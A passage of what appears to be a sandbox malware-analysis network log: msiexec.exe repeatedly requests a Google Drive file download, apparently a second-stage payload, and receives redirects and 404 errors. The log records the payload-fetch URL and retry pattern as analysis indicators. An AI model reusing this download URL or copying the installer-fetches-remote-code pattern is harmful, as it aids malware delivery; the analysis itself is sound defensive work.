Jan 11, 2025 04:34:51.627969027 CET	53	62902	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:34:50.521953106 CET	192.168.2.5	1.1.1.1	0x79b7	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:34:51.620888948 CET	192.168.2.5	1.1.1.1	0x34a	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:34:50.529300928 CET	1.1.1.1	192.168.2.5	0x79b7	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:34:51.627969027 CET	1.1.1.1	192.168.2.5	0x34a	No error (0)	drive.usercontent.google.com		142.250.185.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	51645	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:34:51 UTC	216	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 03:34:51 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:34:51 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-TnSgYOnBkE9QZb9ISAyjSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	51646	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:34:52 UTC	258	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 03:34:52 UTC	2219	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRX17UL1fI3hB9uxb9tb8WTFUeOuyCytY7JLGw-4cNACo3RW9cbLSYAep7ywKG2842v Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:34:52 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-s5g4_WbCwxZQRYwKrI0HIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p; expires=Sun, 13-Jul-2025 03:34:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:34:52 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 46 4b 31 68 57 45 62 44 33 7a 71 7a 46 34 64 34 4f 72 63 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MFK1hWEbD3zqzF4d4OrcgA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	51647	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:03 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:03 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:03 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ynUmWpu9KhLjiNt7JPbH6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	51648	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:04 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:04 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT8Vmv0AlaY1BllZklbRFNltP7n0ZDbTXue7bv3YGLhpZ1CXjcphwpQoS-1jH48m8gQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:04 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-EK_7LpaHiczjIpREZw8K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:35:04 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4f 2d 51 6c 58 4b 4e 32 52 57 39 33 47 37 42 52 35 46 78 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xO-QlXKN2RW93G7BR5FxZQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	51649	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:15 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:15 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:15 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-rR7FXw4PwZckF-sdmcG_kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	51650	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:16 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:17 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSZhZJgL3s8-ZzLMrmkLlDl3KAEoz3L-Dh8YUbJqLebUHiRPwCb7ZdjFe66S9unmbQN Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:16 GMT Content-Security-Policy: script-src 'nonce-SVQ9pgjJG_R5fTc4_TV8rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:35:17 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 6d 4e 48 4a 2d 6e 66 4c 7a 70 6d 41 66 6d 33 44 79 39 38 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tmNHJ-nfLzpmAfm3Dy980w">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	51651	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:27 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:27 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-1e1hkn08GuonyiieO30JEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	51652	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:35:28 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:35:29 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQQpwiaxd-uF1uxgCyhpihgl_08KnbsAuan6Ld0Bj9PsNnrlpLYzMPVTokNG_SoUlBH Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:35:29 GMT Content-Security-Policy: script-src 'nonce-fSC-Yk1TLtLhJkHZDmoHOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:35:29 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 35 42 63 64 65 6a 49 69 34 74 45 77 76 4d 72 67 30 34 5a 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, 